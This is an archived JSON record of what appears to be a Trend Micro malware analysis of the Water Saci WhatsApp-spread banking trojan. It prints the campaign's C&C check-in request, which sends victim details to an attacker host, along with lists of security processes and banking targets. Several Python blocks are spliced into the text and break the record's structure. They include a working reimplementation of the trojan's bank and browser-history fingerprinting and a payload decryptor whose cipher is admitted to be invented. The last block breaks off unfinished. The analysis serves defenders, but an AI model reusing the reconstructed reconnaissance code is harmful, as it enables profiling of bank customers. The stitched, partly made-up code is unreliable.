{
	"id": "ea2cc7a5-79c1-4c8c-a590-1ad1429c50f8",
	"created_at": "2026-04-06T00:13:22.617782Z",
	"updated_at": "2026-04-10T03:37:08.709991Z",
	"deleted_at": null,
	"sha1_hash": "6bfa827f98bc9fb1d5d7e6436f53687eb41cde1e",
	"title": "Unraveling Water Saci's New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3731176,
	"plain_text": "Unraveling Water Saci's New Multi-Format, AI-Enhanced Attacks\r\nPropagated via WhatsApp\r\nPublished: 2025-12-02 · Archived: 2026-04-05 18:29:57 UTC\r\nKey takeaways\r\nThe Water Saci campaign in Brazil has been observed using a highly layered attack chain that involves\r\nvarious file formats (including HTA files, ZIP archives, and PDFs), designed to bypass simple pattern-based detection and increase the complexity of analysis.\r\nThe attackers switched tactics by transitioning from their PowerShell-based propagation routine to a\r\nPython variant, which suggests an accelerated development pipeline. This newly observed variant allows\r\nfor broader browser compatibility, object-oriented code structure, enhanced error handling, and faster\r\nautomation of malware delivery through WhatsApp Web.\r\nEvidence suggests that attackers may have used AI tools like LLMs to convert their malware propagation\r\nscripts from PowerShell to Python; this would explain their capabilities for batch messaging, improved\r\nerror handling, and enhanced console output.\r\nTrend Vision One™ detects and blocks the IoCs discussed in this blog. Trend Micro customers can also\r\naccess tailored hunting queries, threat insights, and intelligence reports to better understand and proactively\r\ndefend against this campaign.\r\nBrazil has seen a recent surge of threats delivered via WhatsApp. As observed in our previously published\r\nresearch on the SORVEPOTEL malwareopen on a new tab and the broader Water Saci campaignopen on a new\r\ntab, this popular platform has been used to launch sophisticated campaigns. Unsuspecting users receive\r\nconvincing messages from trusted contacts, often crafted to exploit social engineering tactics and encourage\r\ninteraction with malicious content. 
While the core objectives of these campaigns remain consistent, this wave showcases advanced techniques in infection, persistence, and evasion, underscoring how legitimate platforms are increasingly being exploited to reach Brazilian targets more effectively.\r\nTheir new multi-format attack chain and possible use of artificial intelligence (AI) to convert propagation scripts from PowerShell to Python exemplify a layered approach that has enabled Water Saci to bypass conventional security controls, exploit user trust across multiple channels, and ramp up infection rates. As adversaries' techniques evolve, organizations must be prepared for the heightened risk posed by campaigns that combine technical complexity with AI-enhanced agility.\r\nMulti-format malware delivery through WhatsApp messages\r\nThe initial stage of this campaign demonstrates a diverse set of entry points employed by the threat actors to reach victims through WhatsApp. Users reported receiving messages from trusted contacts containing various forms of malicious attachments.\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 1 of 29\r\nSome users received compressed archive files, such as ZIP files containing harmful payloads (Figure 1). Others were targeted with messages encouraging them to download what appeared to be benign PDF documents, often accompanied by plausible lures such as requests to update Adobe Reader for proper viewing (Figures 2 and 3).\r\nFigure 1. A WhatsApp message luring the user to open the ZIP file\r\nFigure 2. A WhatsApp message luring the user to open the PDF file\r\nFigure 3. Blurred image luring users to click/update Adobe\r\nA notable subset of victims was targeted with direct delivery of a malicious .hta file. Unlike ZIP or PDF formats, the .hta file executes its embedded script immediately upon opening, streamlining the infection process for the attacker. One detail observed in multiple cases was the download of files with names following the pattern A-{random characters}.hta directly from web.whatsapp[.]com, as shown in the Trend Vision One™ telemetry logs in Figure 4.\r\nFigure 4. Malicious HTA file\r\nFigure 5. Attack chain\r\nInitial vector - HTA file\r\nThe infection chain begins when the user executes a malicious HTA file, which contains an embedded Visual Basic (VB) script wrapped in two layers of obfuscation to evade detection and hinder analysis. Once deobfuscated, the script reveals commands that create a batch file at C:\\temp\\instalar.bat; when executed, the batch file connects to the attacker's command-and-control (C\u0026C) server to download an MSI installer and an automation (Python) script along with its supporting components.\r\nBanking trojan - First stage\r\nFollowing execution of the batch file, the infection chain continues with the download and installation of the MSI package. This installer serves as the primary vehicle for delivering the banking trojan and initiating its malicious activities on the compromised system (Figure 6).\r\nFigure 6. MSI installation leading to the banking trojan payload\r\nUpon inspection, the MSI package is found to contain several key components, described in more detail in Table 1:\r\nFile name - Description\r\nDaXGkoD7.exe - AutoIt interpreter\r\nOns7rxGC.log - Compiled AutoIt script\r\nrun.vbs - Initial launcher for AutoIt\r\nstarter.bat - Batch file to launch AutoIt in a specified folder\r\nucJDpQ.tda - Encrypted PE payload\r\nfKmkzW.dmp - Alternative encrypted PE payload (if ucJDpQ.tda is missing, fKmkzW.dmp serves as the payload)\r\nTable 1. Files in the MSI package\r\nThe installer uses a custom action to execute the included VB script (run.vbs), as shown in Figure 7. The script launches the AutoIt interpreter (DaXGkoD7.exe) to run the compiled AutoIt script (Ons7rxGC.log), shown in Figure 8. This process ultimately leads to the unpacking and activation of the final banking trojan payload hidden within the package.\r\nFigure 7. The MSI installer initially executes the VB script using a CustomAction\r\nFigure 8. The VB script starts the AutoIt interpreter (DaXGkoD7.exe), which then runs the compiled AutoIt payload (Ons7rxGC.log)\r\nThe AutoIt script checks whether it is being executed for the first time and, if so, notifies a remote server (Figure 9). If the marker file executed.dat does not exist, the function sends a notification to a specified URL and creates the marker file with a timestamp. This ensures that the notification is triggered only once, on first execution.\r\nFigure 9. AutoIt script initializing first-execution logic with remote notification\r\nIn other AutoIt scripts recovered from infection cases, the script starts by checking the system language. As shown in Figure 10, it verifies that Windows is set to Portuguese (Brazil) by comparing the locale ID (0416). If not, it shows an error message with the detected language and exits. A helper function translates locale IDs into readable names such as Portuguese (Portugal), English (US), or Spanish (Spain).\r\nFigure 10. Language verification routine ensuring Windows is set to Portuguese (Brazil)\r\nThe script then scans the user's system for banking-related activity (Figure 11), compiles the findings into a list, and sends the data to a C\u0026C server. 
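The two fingerprinting functions described next (probing for the directories of banking security modules, and copying Chrome's History database before querying it) reduce to a few dozen lines. The Python below is an added reconstruction for analysts, not the AutoIt script's own code: it takes the paths from Table 2 and the hosts from Table 3, makes the directory check injectable so it can be exercised without those modules installed, and builds a throwaway History file with Chrome's urls table so the whole thing runs offline on any platform.

```python
"""Added reconstruction of the DETECTARBANCO / VERIFICARHISTORICOCHROME checks.
Not the AutoIt script's code. Directory list = Table 2, host list = Table 3."""
import os
import shutil
import sqlite3
import tempfile

# Table 2: module directory -> bank. Only existence is tested.
BANK_DIRS = {
    r"C:\Program Files (x86)\scpbrad": "Bradesco",
    r"C:\Program Files\Warsaw": "Banco do Brasil / Caixa (Warsaw)",
    r"C:\Program Files\Topaz OFD": "Banco do Brasil / Caixa (Topaz OFD)",
    r"C:\Sicoobnet": "Sicoob",
    os.path.expandvars(r"%LOCALAPPDATA%\Aplicativo Itau"): "Itaú",
}

# Table 3: host -> bank, matched as a substring of each visited URL.
BANK_HOSTS = {
    "www.santander.com.br": "Santander",
    "autoatendimento.bb.com.br": "Banco do Brasil",
    "internetbanking.caixa.gov.br": "Caixa Econômica Federal",
    "www.sicredi.com.br": "Sicredi",
    "banco.bradesco": "Bradesco",
}


def detect_bank_dirs(dirs=BANK_DIRS, exists=os.path.isdir):
    """Report every bank whose security-module directory is present."""
    return sorted({bank for path, bank in dirs.items() if exists(path)})


def check_chrome_history(history_path, hosts=BANK_HOSTS):
    """Copy the History file (Chrome keeps the live one locked), then read
    the urls table from the copy and match the banking hosts."""
    tmpdir = tempfile.mkdtemp()
    try:
        copy = os.path.join(tmpdir, "History")
        shutil.copy2(history_path, copy)
        con = sqlite3.connect(copy)
        try:
            rows = con.execute("SELECT url FROM urls").fetchall()
        finally:
            con.close()
    finally:
        shutil.rmtree(tmpdir, ignore_errors=True)
    return sorted({bank for (url,) in rows
                   for host, bank in hosts.items() if host in url})


def make_fake_history(path, visited):
    """Constructed sample: the columns of Chrome's urls table that matter here."""
    con = sqlite3.connect(path)
    con.execute("CREATE TABLE urls (id INTEGER PRIMARY KEY, url TEXT, "
                "title TEXT, visit_count INTEGER)")
    con.executemany("INSERT INTO urls (url, title, visit_count) VALUES (?, '', 1)",
                    [(u,) for u in visited])
    con.commit()
    con.close()


def demo():
    """Run both checks against constructed data; returns what the script would report."""
    workdir = tempfile.mkdtemp()
    try:
        history = os.path.join(workdir, "History")
        make_fake_history(history, [
            "https://www.google.com/search?q=pix",
            "https://autoatendimento.bb.com.br/portalBB/home.bb",
            "https://banco.bradesco/html/classic/index.shtm",
        ])
        # Pretend only the Warsaw module directory exists on this host.
        only_warsaw = lambda p: p == r"C:\Program Files\Warsaw"
        return {
            "installed": detect_bank_dirs(exists=only_warsaw),
            "history": check_chrome_history(history),
        }
    finally:
        shutil.rmtree(workdir, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

The copy-then-read step is the tell for hunting: a non-browser process reading or copying a file named History out of a Chrome profile directory is rare outside backup software, and it is the same trick infostealers use for cookie and login databases.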
The first function, DETECTARBANCO, checks for the presence of specific directories associated with Brazilian banking applications (Table 2). If these folders exist, the script records the corresponding bank names, effectively fingerprinting which financial institutions the user interacts with. In Brazil, accessing most major banks requires security modules developed by independent companies as an attempt to protect end users from client-side fraud. Attackers know this and use it as a reliable way to guess the victim's primary bank.\r\nFigure 11. Checking for installed Brazilian banking applications\r\nFile path - Associated banking application\r\nC:\\Program Files (x86)\\scpbrad - Bradesco banking software\r\nC:\\Program Files\\Warsaw - Warsaw security module deployed by Banco do Brasil (BB) and Caixa Econômica Federal (CEF)\r\nC:\\Program Files\\Topaz OFD - Topaz OFD anti-fraud module deployed by Banco do Brasil (BB) and Caixa Econômica Federal (CEF)\r\nC:\\Sicoobnet - Sicoob banking software\r\nAppData\\Local\\Aplicativo Itau - Itaú banking application\r\nTable 2. File paths associated with Brazilian banking applications\r\nThe second function, VERIFICARHISTORICOCHROME(), analyzes the user's Chrome browser history to identify visits to banking websites (Figure 12). It locates the Chrome History database within the user's profile directory, creates a temporary copy (the live file is locked while Chrome is running), and reads its contents. The function then searches for specific banking-related URLs (Table 3). If any of these URLs are found, the corresponding bank names are recorded. This technique lets the script detect banking activity even if no banking software is installed on the system.\r\nFigure 12. Checking Chrome browser history for visited banking websites\r\nTargeted URL - Associated bank\r\nwww[.]santander[.]com[.]br - Santander\r\nautoatendimento[.]bb[.]com[.]br - Banco do Brasil\r\ninternetbanking[.]caixa[.]gov[.]br - Caixa Econômica Federal\r\nwww[.]sicredi[.]com[.]br - Sicredi\r\nbanco[.]bradesco - Bradesco\r\nTable 3. Banking-related URLs the second function searches for\r\nAfter identifying installed banking applications and analyzing browser history, the script moves on to another reconnaissance step: checking for antivirus and security software. It inspects running processes for the following executables linked to security products:\r\n360sd.exe, 360tray.exe, ashDisp.exe, aswidsagent.exe, avast.exe, AvastSvc.exe, AvastUI.exe, avgnt.exe, avgui.exe, avguix.exe, avp.exe, avpui.exe, bdagent.exe, ccapp.exe, ccSvcHst.exe, cfp.exe, cmdagent.exe, egui.exe, eguiProxy.exe, ekrn.exe, fshoster32.exe, kavtray.exe, klwtblfs.exe, mbam.exe, MBAMService.exe, mbamtray.exe, mcshield.exe, Mcshield.exe, mcuicnt.exe, MSASCui.exe, MSASCuiL.exe, MsMpEng.exe, NisSrv.exe, ns.exe, PSUAMain.exe, PSANHost.exe, SAVADMINSERVICE.EXE, SAVService.exe, seccenter.exe, SecurityHealthSystray.exe, SophosUI.exe, vkise.exe, vsserv.exe, WRSA.exe, zatray.exe, ZAPrivacyService.exe\r\nThe script also iterates through the Windows Uninstall registry keys, searching for the following keywords related to antivirus and security software:\r\n360, anti-virus, antivirus, avast, avg, bitdefender, comodo, defender, eset, f-secure, kaspersky, malwarebytes, mcafee, norton, panda, security, sophos, trend micro, webroot, zonealarm\r\nIn addition to collecting details about installed banking 
applications, security software, and visited banking websites, the script gathers the following information, which is then sent to a remote C\u0026C server:\r\nComputer name; OS version, architecture and build number; username; local IP address; external IP address; current date and time; Windows version; CPU model; total physical memory\r\nThe script monitors an array of keywords for Brazilian banks, payment platforms, and cryptocurrency exchanges/wallets. It enumerates all open windows and then searches their titles for keyword matches. Targeted entities include:\r\nBrazilian banks: Banco do Brasil, BMG, Bradesco, BS2, BTG Pactual, CEF, Itaú, Santander, Sicoob, Sicredi\r\nPayment platform: Mercado Pago\r\nInternational exchanges: Binance, Bitfinex, Bitstamp, Bybit, Coinbase, Crypto.com, Gate.io, Huobi, Kraken, KuCoin, OKX\r\nBrazilian exchanges: Bitcoin Trade, BitPreco, Braziliex, FlowBTC, Foxbit, Mercado Bitcoin, NovaDAX\r\nCryptocurrency wallets: Atomic Wallet, Blockchain.com, Coinomi, Electrum, Exodus, Jaxx, Ledger Live, MetaMask, MyCrypto, MyEtherWallet, Phantom, Solflare, TokenPocket, Trezor, Trust Wallet\r\nPayload decryption is triggered by the detection of a banking or cryptocurrency-related window on the victim's computer (Figure 13). If any window title contains a keyword for a targeted entity, the script locates the .tda file (ucJDpQ.tda) dropped earlier by the MSI installer. If no .tda file is found, it looks for the .dmp file (fKmkzW.dmp) instead.\r\nFigure 13. Locating, decrypting, and decompressing the payload\r\nOnce located, the encrypted payload (either the .tda or the .dmp file) is read as binary data and passed through a two-stage decryption and decompression process before it is loaded into memory:\r\n1. The payload is decrypted using a custom RC4-like stream cipher with hardcoded parameters (seed=1000, multiplier=3333, increment=3434), which yields the compressed executable hidden inside.\r\n2. The decrypted data is then decompressed using Windows' native LZNT1 algorithm through the RtlDecompressFragment API, expanding it back into a full PE executable.\r\nIf a .tda file is present, the AutoIt script decrypts it and loads it into memory as an intermediate PE loader (Stage 2). If only a .dmp file is found (no .tda present), the AutoIt script bypasses the intermediate loader entirely and loads the banking trojan directly into the AutoIt process memory, skipping the process hollowing step and running as a simpler two-stage infection.\r\nBanking trojan - Second stage\r\nThe intermediate loader searches for additional .dmp or .tda files containing the final banking trojan, then decrypts and decompresses the payload using the same routine (Figure 14).\r\nFigure 14. Locating the final .dmp or .tda payload file\r\nThe loader injects the result into a hollowed svchost.exe process to blend in with legitimate Windows system processes (Figure 15). It also includes an alternate fallback base address in case virtual memory allocation at the preferred address fails, so the injection can still proceed (Figures 16 and 17).\r\nFigure 15. Create suspended process and allocate memory\r\nFigure 16. Alternate fallback base addresses\r\nFigure 17. Resuming the hollowed process after setting the thread context and writing the malicious payload into memory\r\nBanking trojan - Persistence\r\nAfter the AutoIt script calls the payload's entry point, it waits exactly two seconds to give the payload time to complete the process-hollowing routine inside svchost.exe (Figure 18).\r\nFigure 18. Loading the decrypted payload into memory and capturing the PID\r\nThe script then lists all running svchost.exe processes (Figure 19), retrieves their creation timestamps, and picks the most recent instance, which it assumes is the process the payload hollowed.\r\nFigure 19. Monitoring the most recent svchost.exe process\r\nThe script stores the PID of that svchost.exe process and enters a continuous monitoring loop that regularly checks whether this specific process is still running. If the hollowed svchost.exe is terminated, the malware resets its state, clears the stored PID, and waits to re-inject the payload the next time the victim opens a banking window, ensuring persistent access to the victim's banking sessions.\r\nBanking trojan\r\nSeveral behaviors in this sample are similar to those observed in the Casbaneiro (Metamorfo) banking malware lineage. Like earlier Metamorfo campaigns that relied on a launcher executable invoking AutoIt3 to run a compiled .A3X script alongside a DLL containing the main payload, this sample exhibits the same multi-stage AutoIt-based delivery pattern. This chain ultimately unpacks and activates the banking trojan payload, mirroring Metamorfo's signature reliance on AutoIt as a loader framework. 
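The two-stage unpacking described under Figure 13 (stream-cipher decryption, then LZNT1 through RtlDecompressFragment) is worth being able to reproduce off-box, so that .tda and .dmp files can be unpacked from a disk image without running the AutoIt script. The Python below is an added example, not code recovered from the sample. The LZNT1 decoder is an exact implementation of the format RtlDecompressFragment consumes and needs no Windows API. The keystream generator, however, is an assumption: a plain 32-bit linear congruential generator fed the three constants from the sample stands in for the actual RC4-like routine, which this post does not reproduce, and it should be swapped for the real one once recovered. The encrypted blob is constructed by running the same XOR over a hand-assembled LZNT1 chunk.

```python
"""Added example, not the sample's code. Stage 1 keystream is an ASSUMED
stand-in (LCG over the published constants); stage 2 LZNT1 is exact."""
import struct

SEED, MULTIPLIER, INCREMENT = 1000, 3333, 3434  # constants named in the analysis


def keystream(n, seed=SEED, mult=MULTIPLIER, inc=INCREMENT):
    """ASSUMPTION: a 32-bit LCG emitting one byte of state per step. The real
    generator is not published; replace this function with it once recovered."""
    state, out = seed, bytearray()
    for _ in range(n):
        state = (state * mult + inc) & 0xFFFFFFFF
        out.append((state >> 16) & 0xFF)
    return bytes(out)


def xor_with_keystream(data):
    """XOR is its own inverse, so this both encrypts and decrypts."""
    return bytes(a ^ b for a, b in zip(data, keystream(len(data))))


def lznt1_decompress_chunk(chunk):
    """One LZNT1 chunk body: a flag byte, then up to 8 tokens (literal or back-reference)."""
    out, i = bytearray(), 0
    while i < len(chunk):
        flags, i = chunk[i], i + 1
        for bit in range(8):
            if i >= len(chunk):
                break
            if not (flags >> bit) & 1:
                out.append(chunk[i])
                i += 1
                continue
            token = struct.unpack_from("<H", chunk, i)[0]
            i += 2
            # The 16-bit token splits into offset and length; the length field
            # loses a bit each time the output written so far doubles past 16.
            pos, l_mask, o_shift = len(out) - 1, 0xFFF, 12
            while pos >= 0x10:
                l_mask >>= 1
                o_shift -= 1
                pos >>= 1
            length = (token & l_mask) + 3
            offset = (token >> o_shift) + 1
            for _ in range(length):  # byte-wise so overlapping runs expand correctly
                out.append(out[-offset])
    return bytes(out)


def lznt1_decompress(buf):
    """Walk the chunk headers: bit 15 = compressed, low 12 bits = size - 1."""
    out, i = bytearray(), 0
    while i + 2 <= len(buf):
        header = struct.unpack_from("<H", buf, i)[0]
        i += 2
        if header == 0:
            break
        size = (header & 0xFFF) + 1
        chunk = buf[i:i + size]
        i += size
        out += lznt1_decompress_chunk(chunk) if header & 0x8000 else chunk
    return bytes(out)


def unpack_payload(blob):
    """Decrypt, decompress, and sanity-check the DOS header as the loader would."""
    pe = lznt1_decompress(xor_with_keystream(blob))
    if not pe.startswith(b"MZ"):
        raise ValueError("decrypted data is not a PE image")
    return pe


# Constructed sample. Literals M Z A B C, then one back-reference (offset 3,
# length 12) that expands to ABC x 4; header 0xB007 = compressed, 8-byte chunk.
PLAINTEXT = b"MZ" + b"ABC" * 5
COMPRESSED = b"\x07\xb0\x20MZABC\x09\x20"
ENCRYPTED = xor_with_keystream(COMPRESSED)

if __name__ == "__main__":
    print(unpack_payload(ENCRYPTED))
```

On a real .tda or .dmp, feed the file bytes to unpack_payload() and write the result out; if the MZ check fails with the stand-in generator, the keystream is the first thing to fix, since the LZNT1 stage only ever sees correctly decrypted input.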
Combined with the familiar window title monitoring, registry-based persistence, IMAP-based fallback C\u0026C mechanism, and the presence of token-like C\u0026C markers such as \u003c||\u003e, the sample reflects both structural and behavioral continuity with Casbaneiro/Metamorfo.\r\nAnti-sandbox analysis\r\nOnce executed, the payload begins with an aggressive set of anti-virtualization checks designed to evade analysis environments. The malware queries the registry path HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\ looking specifically for the following VM-related services: VGAuthService, vm3dservice, VMTools, vmvss\r\nIt also enumerates active services to check for the same strings. If any match is found, the malware immediately raises a custom exception (EEDFADE, the 0x0EEDFADE code Delphi uses for its own exceptions) via RaiseException, effectively terminating execution to avoid sandbox analysis (Figure 20).\r\nFigure 20. Exception triggered for anti-sandbox purposes\r\nSystem profiling via WMI\r\nIf virtualization is not detected, the payload proceeds to gather host information through multiple WMI queries, including AntiVirusProduct, Win32_ComputerSystem, Win32_OperatingSystem, and Win32_Processor. The collected information is later sent to the C\u0026C server as part of the initial check-in.\r\nRegistry modification and persistence\r\nThe malware creates a unique application registry entry under HKEY_CURRENT_USER\\Software\\MyUniqueApp, setting UniqueSerial to a UUID-generated string. To maintain persistence, it adds itself to the AutoRun registry key at HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run, pointing the entry to its executable path. 
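Every stage of the chain reconstructed so far leaves a process-creation event behind: mshta.exe opening an A-{random characters}.hta file, cmd.exe running C:\temp\instalar.bat, the AutoIt interpreter being started with a compiled script that carries a .log extension, and a svchost.exe whose parent is not services.exe (the hollowed instance; legitimate service hosts are started by services.exe, so treat this as a heuristic rather than a certainty). The Python below is an added detection example, not one of Trend Micro's rules. The event records are constructed in a Sysmon-like shape with this example's own field names, and the parent expected for the AutoIt interpreter (wscript.exe, cscript.exe, or msiexec.exe, depending on how the custom action invokes run.vbs) is an assumption.

```python
"""Added detection example over constructed process-creation events.
Field names (pid, image, parent_image, cmdline) are this example's own."""
import re


def base(path):
    """File name of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


# (rule name, predicate). Each predicate covers one stage of the chain.
RULES = [
    ("hta_named_like_whatsapp_download",
     lambda e: base(e["image"]) == "mshta.exe"
     and re.search(r"\bA-[A-Za-z0-9]+\.hta\b", e["cmdline"]) is not None),
    ("instalar_bat_in_c_temp",
     lambda e: base(e["image"]) == "cmd.exe"
     and re.search(r"c:\\temp\\instalar\.bat", e["cmdline"], re.I) is not None),
    ("compiled_autoit_script_as_log",  # ASSUMED parent set, see lead-in
     lambda e: base(e["parent_image"]) in {"wscript.exe", "cscript.exe", "msiexec.exe"}
     and re.search(r"\s\S+\.log(\s|$)", e["cmdline"], re.I) is not None),
    ("svchost_not_started_by_services",  # heuristic: service hosts come from services.exe
     lambda e: base(e["image"]) == "svchost.exe"
     and base(e["parent_image"]) != "services.exe"),
]


def evaluate(events):
    """Return (rule, pid) for every event/rule pair that fires, in event order."""
    return [(name, e["pid"]) for e in events for name, pred in RULES if pred(e)]


def chain_detected(events, min_stages=3):
    """Alert on the chain, not on a single stage: a .bat in C:\\temp or a stray
    svchost child is noisy alone, but three distinct stages on one host is not."""
    return len({name for name, _ in evaluate(events)}) >= min_stages


# Constructed telemetry for one host; user name, PIDs and the MSI name are made up.
SAMPLE_EVENTS = [
    {"pid": 1200, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" "C:\Users\ana\Downloads\A-k3j9x2.hta"'},
    {"pid": 1244, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"cmd.exe /c C:\temp\instalar.bat"},
    {"pid": 1290, "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"msiexec.exe /i C:\temp\setup.msi /qn"},
    {"pid": 1310, "image": r"C:\Users\ana\AppData\Local\Temp\DaXGkoD7.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"DaXGkoD7.exe Ons7rxGC.log"},
    {"pid": 1400, "image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Users\ana\AppData\Local\Temp\DaXGkoD7.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe"},
    {"pid": 900, "image": r"C:\Windows\System32\svchost.exe",  # benign service host
     "parent_image": r"C:\Windows\System32\services.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
]

if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(hit)
    print("chain:", chain_detected(SAMPLE_EVENTS))
```

The interpreter rule keys on the file extension rather than the file name because DaXGkoD7.exe and Ons7rxGC.log are per-build names; a compiled AutoIt script handed to any process as a .log, .dmp, or .tda argument is the durable signal.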
It also drops an additional marker under HKEY_CURRENT_USER\\Software\\MeuApp by setting inicio = true, indicating that the main routine should begin.\r\nC\u0026C check-in communication\r\nThe payload then connects to its C\u0026C server at hxxps://serverseistemasatu.com/data.php?recebe and sends a POST request containing system and user information:\r\nPOST /data.php?recebe HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: DelphiApp\r\nHost: serverseistemasatu.com\r\nContent-Length: 267\r\nCache-Control: no-cache\r\n\r\nnomeRegistro={User name}\u0026nomeComputador={Computer name}\u0026nomeSistema={Operating System}\u0026processador={Processor}\u0026antivirus={Antivirus product}\u0026ultimaAtualizacao={Date}\r\nTargeted banking window detection\r\nThe malware includes a timer-based routine (TForm1_Timer4Timer) that continuously scans the titles of active windows to identify whether the user is interacting with banking or cryptocurrency platforms. When a match is found, the malware classifies the detected application based on predefined window title substrings commonly associated with major financial institutions and exchanges (Table 4). Each line below lists the category, the title substrings matched, and the label the malware assigns.\r\nSantander (detected as Santander): Santander - Ofertas para Empresas; Internet banking empresarial - Santander; Santander -\r\nBanco do Brasil (detected as Banco do Brasil): Banco do Brasil -; Banco do Brasil e mais; Autoatendimento Banco do Brasil\r\nBanrisul (detected as Banrisul): Banrisul Home Banking; Portal Internet Banrisul Home Banking; Banrisul Office Banking\r\nTribanco (detected as Tribanco): Tribanco » Para sua Empresa; Tribanco » Para Você\r\nBradesco (detected as Bradesco): Banco Bradesco; Bradesco Net Empresa Bradesco -; Bradesco Net Empresa Bradesco; Bradesco Prime -; Bradesco Prime e; Internet Banking Bradesco:; Internet Banking Bradesco: Saldos, extratos, Pix e muito mais!; Bradesco Exclusive Digital Mais facilidade e autonomia -; Bradesco Exclusive Digital Mais facilidade e autonomia; Bradesco Para Você; Bradesco Prime Digital Bradesco Prime; Bradesco Global Private Bank Assessoria de Investimentos Especializada; NavegadorExclusivoBradesco.exe\r\nSicredi (detected as Sicredi): Sicredi\r\nSicoob (detected as Sicoob): SicoobNet; Sicoob -; sicoob.com.br - SicoobNet\r\nBMG (detected as BMG): Bem-vindo ao seu BMG; BMG -\r\nBTG Pactual (detected as BTG Pactual): app.btgpactual.com; BTG Pactual -; BTG Pactual Empresas\r\nBS2 (detected as BS2): app.empresas.bs2.com; BS2 -; Empresas BS2\r\nItaú (detected as Itaú): Banco Itaú -; Itaú Personnalité I; Itaú Uniclass:; Itaú BBA -; Itaú BBA; Itaú BBA e; Itaú Empresas\r\nCrypto/Exchange (label in parentheses): Entrar Binance (Binance); Iniciar sessão Binance (Binance); Entre no site da OKX OKX (OKX); Crypto.com Log in (Crypto.com); Faça o login e acesse a sua conta do Mercado Bitcoin MB (Mercado Bitcoin); Coinbase (CryptoBR); Foxbit (CryptoBR); Faça o login e acesse a sua conta do NovaDax NovaDax (NovaDax); Faça login e opere Bitget (Bitget); Login Bybit (Bybit); - default_wallet (CryptoBR); Login - Acesse sua conta Coinext (Coinext)\r\nTable 4. Predefined window title substrings, commonly associated with major financial institutions and exchanges, that the malware classifies\r\nIMAP-based secondary C\u0026C discovery\r\nThe payload uses the same IMAP-based technique previously documented in our recent analysis of the Water Saci campaign: the malware logs into a terra.com.br mailbox using hardcoded credentials and retrieves an email titled “meu” to extract an updated C\u0026C address from a line beginning with IP: (Figure 21). The key difference is that while the earlier instance appeared only in a recovered auxiliary script, this version incorporates the IMAP routine directly into the injected payload, indicating that the operators are reusing the same infrastructure and method but have now embedded it deeper into the malware's runtime to make C\u0026C updates more seamless and reliable.\r\nFigure 21. Function used for IMAP-based C\u0026C retrieval\r\nBrowser termination routine\r\nBefore executing credential-related actions, the payload forcibly terminates several browsers: chrome.exe, firefox.exe, msedge.exe, NavegadorExclusivoBradesco.exe, Opera.exe\r\nThis behavior is common in banking malware that intercepts sessions or forces victims to reopen banking sites under attacker-controlled conditions.\r\nBackdoor capabilities\r\nThe injected payload also includes an extensive set of backdoor commands, granting the operator near-complete remote control over the infected system. 
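The check-in request shown above is distinctive enough to match on the wire: a POST to /data.php?recebe, a User-Agent of DelphiApp, and six Portuguese form-field names. The Python below is an added example, not from the original post or from Trend Vision One. It parses a raw HTTP request, returns the decoded fields so an analyst can see exactly what the implant reported, and requires two of the three indicators before calling it a match, so that a single reused detail (DelphiApp is the stock user agent of Delphi HTTP components and appears in benign software) does not alert on its own. The captured request is constructed with placeholder field values; the host is the one named in the analysis.

```python
"""Added example: parse a captured HTTP request and score it against the
check-in described above. Both sample requests below are constructed."""
from urllib.parse import parse_qs

CHECKIN_PATH = "/data.php?recebe"
CHECKIN_UA = "DelphiApp"
CHECKIN_FIELDS = {"nomeRegistro", "nomeComputador", "nomeSistema",
                  "processador", "antivirus", "ultimaAtualizacao"}


def parse_http_request(raw):
    """Split a raw request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def classify_checkin(raw):
    """Return the decoded form fields plus which indicators matched."""
    method, target, headers, body = parse_http_request(raw)
    fields = {k: v[0] for k, v in parse_qs(body).items()}
    reasons = []
    if method == "POST" and target == CHECKIN_PATH:
        reasons.append("path")
    if headers.get("user-agent") == CHECKIN_UA:
        reasons.append("user-agent")
    if CHECKIN_FIELDS <= set(fields):
        reasons.append("field-set")
    return {
        "match": len(reasons) >= 2,  # one indicator alone is not enough
        "reasons": reasons,
        "host": headers.get("host", ""),
        "fields": fields,
    }


# Constructed capture: placeholder values in the shape the implant sends.
SAMPLE_REQUEST = (
    "POST /data.php?recebe HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: DelphiApp\r\n"
    "Host: serverseistemasatu.com\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
    "nomeRegistro=ana&nomeComputador=WS-FIN-07&nomeSistema=Windows+10+Pro"
    "&processador=Intel%28R%29+Core%28TM%29+i5&antivirus=Windows+Defender"
    "&ultimaAtualizacao=2025-11-28+14%3A02%3A11"
)

# Constructed control: same field names, different path and a browser UA,
# so only one indicator fires and the request is not flagged.
CONTROL_REQUEST = (
    "POST /contact HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Host: example.org\r\n"
    "\r\n"
    "nomeRegistro=ana&nomeComputador=x&nomeSistema=y&processador=z"
    "&antivirus=w&ultimaAtualizacao=v"
)

if __name__ == "__main__":
    print(classify_checkin(SAMPLE_REQUEST))
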